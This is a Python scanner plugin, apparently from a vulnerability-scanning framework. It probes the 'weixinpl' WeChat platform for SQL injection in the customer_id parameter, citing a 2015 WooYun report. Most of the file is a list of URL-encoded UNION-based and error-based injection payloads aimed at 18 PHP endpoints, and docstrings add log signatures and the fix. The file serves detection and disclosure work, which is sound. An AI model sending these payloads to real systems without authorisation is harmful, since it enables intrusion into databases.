#coding:utf-8
from lib.curl import *
#-*- encoding:utf-8 -*-
#__author__ = '1c3z'
#ref http://wooyun.org/bugs/wooyun-2015-0109221


def assign(service, arg):
    """Accept the task only when *service* is ``"weixinpl"``.

    Returns the tuple ``(True, arg)`` for a matching service name and
    ``None`` for anything else; *arg* is passed through unchanged.
    """
    # Guard clause: any other service name is declined with None.
    if service != "weixinpl":
        return None
    return True, arg


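def audit(arg):
    """Check the weixinpl endpoints below for SQL injection in ``customer_id``.

    Every entry in ``payloads`` is a relative path whose ``customer_id``
    query parameter carries a SQL fragment that calls ``md5(0x22)``. The
    first two entries use a ``UNION ALL SELECT``; the rest embed the same
    call in a ``COUNT(*)`` / ``FLOOR(RAND(0)*2)`` / ``GROUP BY`` subquery.
    If the response body contains ``marker``, the URL is reported through
    ``security_hole``. Reference from the file header: wooyun-2015-0109221.

    Args:
        arg: Base URL of the target. It is concatenated directly with the
            relative path, so it has to end with ``/``.

    Returns:
        None. Findings are reported only through ``security_hole``.

    Notes for defenders:
        * A hit means the ``customer_id`` value reached the SQL statement
          as SQL rather than as data. The application-side fix is to
          handle the parameter as an integer or a bound parameter.
        * The probes are easy to spot in access logs: ``customer_id=-1``
          followed by ``md5%280x22%29``, and in most entries
          ``INFORMATION_SCHEMA.CHARACTER_SETS``.
    """
    # Presumably the hex MD5 of the single byte 0x22, i.e. the value the
    # injected md5(0x22) call would produce. TODO confirm.
    marker = 'b15835f133ff2e27c7cb28117bfae8f4'
    payloads = [
        'weixinpl/huodong/show_huodong.php?customer_id=-1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2Cmd5%280x22%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20',
        'weixinpl/miaosha/show_miaosha.php?customer_id=-1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2Cmd5%280x22%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20',
        'weixinpl/order_car/show_car.php?customer_id=-1%20or%20%28SELECT%203442%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28md5%280x22%29%2C%28SELECT%20%28ELT%283442%3D3442%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2a2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29',
        'weixinpl/wish/show_wish.php?customer_id=-1%20or%20%28SELECT%203442%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28md5%280x22%29%2C%28SELECT%20%28ELT%283442%3D3442%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2a2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29',
        'weixinpl/online/show_online.php?customer_id=-1%20or%20%28SELECT%203442%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28md5%280x22%29%2C%28SELECT%20%28ELT%283442%3D3442%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2a2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29',
        'weixinpl/xitie_new/show_xitie.php?customer_id=-1%20or%20%28SELECT%203442%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28md5%280x22%29%2C%28SELECT%20%28ELT%283442%3D3442%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2a2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29',
        'weixinpl/feedback/feedback.php?customer_id=-1%20or%20%28SELECT%203442%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28md5%280x22%29%2C%28SELECT%20%28ELT%283442%3D3442%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2a2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29',
        'weixinpl/recruit/show_recruit.php?customer_id=-1%20or%20%28SELECT%203442%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28md5%280x22%29%2C%28SELECT%20%28ELT%283442%3D3442%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2a2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29',
        'weixinpl/insurance/show_insurance.php?customer_id=-1%20or%20%28SELECT%203442%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28md5%280x22%29%2C%28SELECT%20%28ELT%283442%3D3442%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2a2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29',
        'weixinpl/guahao/show_guahao.php?customer_id=-1%20or%20%28SELECT%203442%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28md5%280x22%29%2C%28SELECT%20%28ELT%283442%3D3442%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2a2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29',
        'weixinpl/car_tips/index.php?customer_id=-1%20or%20%28SELECT%203442%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28md5%280x22%29%2C%28SELECT%20%28ELT%283442%3D3442%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2a2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29',
        'weixinpl/guide/show_guide.php?customer_id=-1%20or%20%28SELECT%203442%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28md5%280x22%29%2C%28SELECT%20%28ELT%283442%3D3442%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2a2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29',
        'weixinpl/sign/show_sign.php?customer_id=-1%20or%20%28SELECT%203442%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28md5%280x22%29%2C%28SELECT%20%28ELT%283442%3D3442%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2a2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29',
        'weixinpl/new_dingcan/catering.php?customer_id=-1%20or%20%28SELECT%203442%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28md5%280x22%29%2C%28SELECT%20%28ELT%283442%3D3442%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2a2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29',
        'weixinpl/order_baoxian/show_order.php?customer_id=-1%20or%20%28SELECT%203442%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28md5%280x22%29%2C%28SELECT%20%28ELT%283442%3D3442%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2a2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29',
        'weixinpl/zhengwu/zhengwu.php?customer_id=-1%20or%20%28SELECT%203442%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28md5%280x22%29%2C%28SELECT%20%28ELT%283442%3D3442%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2a2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29',
        'weixinpl/training/training.php?customer_id=-1%20or%20%28SELECT%203442%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28md5%280x22%29%2C%28SELECT%20%28ELT%283442%3D3442%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2a2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29',
        'weixinpl/booth/show_booth.php?customer_id=-1%20or%20%28SELECT%203442%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28md5%280x22%29%2C%28SELECT%20%28ELT%283442%3D3442%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2a2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29',
    ]
    for payload in payloads:
        url = arg + payload
        # NOTE(review): payload is also handed to curl2 as its second
        # positional argument, as in the original; confirm against the
        # helper's signature what it does with that value.
        code, head, res, errcode, _ = curl.curl2(url, payload)
        # An empty or missing body (e.g. a failed request) must not abort
        # the remaining checks with a TypeError on the `in` test.
        if res and marker in res:
            security_hole(url)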
                        
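if __name__ == '__main__':
    # Stand-alone self-test. The base URL comes from the command line, so
    # no host is baked into the plugin; the original always probed one
    # fixed external host whenever the file was run directly.
    import sys
    from dummy import *

    if len(sys.argv) != 2:
        sys.exit('usage: python %s <base-url-ending-in-slash>' % sys.argv[0])
    audit(assign('weixinpl', sys.argv[1])[1])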